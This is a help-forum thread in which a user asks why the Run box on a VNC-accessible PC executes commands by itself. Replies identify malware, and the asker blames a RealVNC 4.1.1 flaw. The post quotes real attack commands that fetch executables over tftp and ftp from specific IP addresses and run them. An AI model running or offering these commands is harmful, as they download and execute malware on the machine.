tennisjones
asked on
Run command auto opens and tries to execute a cmd .exe file
I have VNC setup to access my home pc from the office. I have been having problems getting connected lately. I have just noticed that the run command pops up by itself and tries to run a command. A couple examples are below.
cmd /c tftp -i 71.12.24.138 GET winfudmgear.exe &winfudmgear.exe &exit
cmd.exe /c del i&echo open 71.138.204.189 15695 > i&echo user 1 1 >> i &echo get 758.exe >> i &echo quit >> i &ftp -n -s:i &758.exe&del i&exit
I can see that it has ran these numerous times. I have Mcafee Internet Security and have checked for a virus, malware & spyware and nothing shows up. The system seems a little slower also so I know that something is up. Any ideals?
cmd /c tftp -i 71.12.24.138 GET winfudmgear.exe &winfudmgear.exe &exit
cmd.exe /c del i&echo open 71.138.204.189 15695 > i&echo user 1 1 >> i &echo get 758.exe >> i &echo quit >> i &ftp -n -s:i &758.exe&del i&exit
I can see that it has ran these numerous times. I have Mcafee Internet Security and have checked for a virus, malware & spyware and nothing shows up. The system seems a little slower also so I know that something is up. Any ideals?
So in other words, it's either time to Dance the Security Tango ( http://securitytango.com/tango.php Don't forget, if you skip a step doing the Tango, you are just moving, not Dancing.) or reinstall http://www.michaelstevenstech.com/XPrepairinstall.htm .
I cleaned that off of one of our remote user's laptops...definitely malware. I suggest using Ewido to clean it out. I think it was Zlob.irc if I remember correctly.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Thanks, It was the RealVNC. Version 4.1.1 has a security flaw.
http://fileinfo.prevx.com/adware/qq3fc145472144-WINF26067739/WINFUDMGEAR.EXE.html